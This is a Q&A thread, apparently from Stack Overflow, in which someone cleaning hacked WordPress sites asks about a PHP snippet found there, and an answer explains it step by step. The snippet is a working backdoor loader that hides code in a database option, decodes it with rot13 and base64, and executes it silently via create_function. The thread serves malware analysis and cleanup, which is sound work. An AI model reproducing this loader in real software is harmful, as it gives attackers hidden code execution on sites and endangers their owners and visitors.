# Hacked Code Decoded

Tags: php, wordpress, base64

I'm cleaning some hacked wordpress sites right now, but can't work out what this code actually does. Thought it would probably be useful to know. Can anyone help me decipher it?

```
$z=get_option("_site_transient_poptags_29129c90ada88ec96b7881049ab64b45"); 
$z=base64_decode(str_rot13($z['photo'])); if(strpos($z,"5F88EE48")!==false)
{ $_z=create_function("",$z); @$_z(); }
```

Comment: Is creating and executing a function hidden in an option on your Wordpress site and encoded using base64 and rot13 http://www.rot13.com/ http://www.base64decode.org/ Anyway, stackoverflow is not the place to ask for that.

Answer (score 1, accepted):

`get_option` will look at table [wp_options](http://codex.wordpress.org/Database_Description#Table:_wp_options) for a key with that name `_site_transient_poptags_29129c90ada88ec96b7881049ab64b45`

it's the same as doing

```
select option_value from wp_options where option_name='_site_transient_poptags_29129c90ada88ec96b7881049ab64b45';
```

Watever that option_value is, the get_options [will try to unserialize](https://codex.wordpress.org/Function_Reference/maybe_unserialize) it before returning it. **This is where it gets nasty**, because unserialized data can be of any type. In this case option_value was a string which got unserialized to an array.

This array probably has one or more key=>value pairs. In this case, the one that matters is under the `photo` key. The value of that key is [rot13d](http://www.php.net/manual/es/function.str-rot13.php) and [base64_decoded](https://www.php.net/manual/es/function.base64-decode.php). Both rot13 and base64_decode parts are only meant to 'translate' what will appear as random characters and store a readable string into the variable $z. It's as elaborated as spelling it backwards.

If the variable $z contains the substring `5F88EE48` then it will create an anonymous function, whose content is the value of $z (which means it performs an evaluation of $z) and it inmediately fires itself with the [@ error supressor](http://www.php.net/manual/en/language.operators.errorcontrol.php) character, in order not to raise errors, exceptions or leave logs.

As you might know, if your site was compromised there is no real clean method but to reinstall the code, and even if you do, you might still have compromised fields in your DB. This is like peeing on a pool and then trying to get the pee out of it.